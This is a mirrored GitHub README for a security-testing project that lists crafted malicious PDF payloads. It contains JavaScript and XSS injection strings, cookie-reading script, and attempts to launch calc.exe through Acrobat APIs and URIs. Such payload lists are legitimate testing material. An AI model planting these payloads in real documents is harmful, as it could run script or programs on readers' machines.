Giter Site home page Giter Site logo

payloadsallthepdfs's Introduction

Payloads All The PDFs

Follow @evaristegal0is

A list of crafted malicious PDF files to test the security of PDF readers and tools.

Vulnerabilities found

Payloads list

payload1.pdf

Line 31. Understand if Acrobat Javascript APIs are supported.

/JS (app.alert\(1\); Object.getPrototypeOf(function*(){}).constructor = null; ((function*(){}).constructor("document.write('<script>confirm(document.cookie);</script><iframe src=https://14.rs>');"))().next();)

Line 69. Try to run arbitrary Javascript abusing the data URI scheme.

/URI (data:text/html,<script>alert\(2\);</script>)

Line 177. Try to inject Javascript code using annotations.

<</Type /Annot /Rect [284.7745656638 581.6814031126 308.7745656638 605.6814031126 ] /Subtype /Text /M (D:20210402013803+02'00) /C [1 1 0 ] /Popup 15 0 R /T (\">'><details open ontoggle=confirm\(3\)>) /P 6 0 R /Contents (��^@"^@>^@'^@>^@<^@d^@e^@t^@a^@i^@l^@s^@ ^@o^@p^@e^@n^@ ^@o^@n^@t^@o^@g^@g^@l^@e^@=^@c^@o^@n^@f^@i^@r^@m^@\(^@'^@X^@S^@S^@'^@\)^@>) >>

payload2.pdf

Line 69. Try to run arbitrary Javascript abusing the data URI scheme.

/URI (\">'><details open ontoggle=confirm\(2\)>)

payload3.pdf

Line 31. Understand if the PDF reader or tool runs arbitrary Javascript bypassing the Acrobat APIs.

/JS (app.alert\(1\); confirm\(2\); prompt\(document.cookie\); document.write\("<iframe src='https://14.rs'>"\);)

Line 69. Try to run remote commands on Windows.

/URI (file:///C:/Windows/system32/calc.exe)

payload4.pdf

Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

/JS (app.alert\(1\); app.openDoc("/C/Windows/System32/calc.exe");)

Line 69. Try to run remote commands on Windows.

 /URI (START C:/\Windows/\system32/\calc.exe)

payload5.pdf

Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

/JS (app.alert\(1\); app.launchURL\("START C:/\Windows/\system32/\calc.exe", true\); app.launchURL\("javascript:confirm\(3\);", true\);)

Line 69. Try to run arbitrary Javascript abusing the data URI scheme.

 /URI (javascript:confirm\(2\);)

payload6.pdf

Line 31. Try to run remote commands on Windows by abusing Acrobat Javascript APIs.

 /JS (app.alert\(1\); app.launchURL\("/C/Windows/system32/calc.exe", true\); app.launchURL\("'><details open ontoggle=confirm\(3\);", true\);)

Hack the planet

If you want to support me you can offer me a coffee ☕

Buy Me A Coffee

payloadsallthepdfs's People

Contributors

luigigubello avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.